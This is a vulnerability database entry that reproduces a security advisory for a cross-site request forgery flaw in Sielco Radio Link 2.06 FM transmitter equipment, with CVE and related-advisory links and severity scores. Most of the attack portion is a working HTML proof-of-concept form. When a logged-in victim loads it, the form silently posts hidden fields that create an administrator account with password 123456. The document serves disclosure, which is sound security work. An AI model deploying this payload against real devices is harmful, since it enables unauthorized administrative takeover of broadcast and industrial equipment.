Sielco Radio Link 2.06 Cross-Site Request Forgery (Add Admin)

🗓️ 30 Mar 2023 00:00:00Reported by Gjoko KrsticType

zeroscience🔗 www.zeroscience.mk👁 296 Views

Sielco Radio Link 2.06 Cross-Site Request Forgery (Add Admin) allowing unauthorized actions via HTTP requests

Reporter	Title	Published	Views	Family All 11
Circl	CVE-2023-45317	26 Oct 202320:15	–	circl
CNNVD	Sielco Analog FM Transmitters Cross-Site Request Forgery Vulnerability	26 Oct 202300:00	–	cnnvd
CVE	CVE-2023-45317	26 Oct 202316:17	–	cve
Cvelist	CVE-2023-45317 Sielco Radio Link and Analog FM Transmitters Cross-Site Request Forgery	26 Oct 202316:17	–	cvelist
EUVD	EUVD-2023-49611	3 Oct 202520:07	–	euvd
ICS	Sielco Radio Link and Analog FM Transmitters	26 Oct 202306:00	–	ics
NVD	CVE-2023-45317	26 Oct 202317:15	–	nvd
Prion	Code injection	26 Oct 202317:15	–	prion
Positive Technologies	PT-2023-29494 · Sielco · Analog Fm Transmitter +12	26 Oct 202300:00	–	ptsecurity
Vulnrichment	CVE-2023-45317 Sielco Radio Link and Analog FM Transmitters Cross-Site Request Forgery	26 Oct 202316:17	–	vulnrichment

<!--


Sielco Radio Link 2.06 Cross-Site Request Forgery (Add Admin)


Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.06 (RTX19)
                  2.05 (RTX19)
                  2.00 (EXC19)
                  1.60 (RTX19)
                  1.59 (RTX19)
                  1.55 (EXC19)

Summary: Sielco develops and produces radio links for all
transmission and reception needs, thanks to innovative units
and excellent performances, accompanied by a high reliability
and low consumption.

Desc: The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks
to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site.

Tested on: lwIP/2.1.1
           Web/2.9.3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5761
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5761.php


26.01.2023

--><html><body><p>CSRF Add Admin:
---------------


  </p>
<form action="http://radiolink/protect/users_rx.htm" method="POST">
<input name="pwd0" type="hidden" value=""/>
<input name="pwd0bis" type="hidden" value=""/>
<input name="user1" type="hidden" value="Reader"/>
<input name="pwd1" type="hidden" value="123456"/>
<input name="pwd1bis" type="hidden" value="123456"/>
<input name="auth1" type="hidden" value="2"/>
<input name="user2" type="hidden" value=""/>
<input name="pwd2" type="hidden" value=""/>
<input name="pwd2bis" type="hidden" value=""/>
<input name="auth2" type="hidden" value="0"/>
<input name="user3" type="hidden" value=""/>
<input name="pwd3" type="hidden" value=""/>
<input name="pwd3bis" type="hidden" value=""/>
<input name="auth3" type="hidden" value="0"/>
<input type="submit" value="Adminize Me!"/>
</form>
</body></html>

30 Mar 2023 00:00Current

7.2High risk

Vulners AI Score7.2

CVSS 3.18.8

EPSS0.00109

SSVC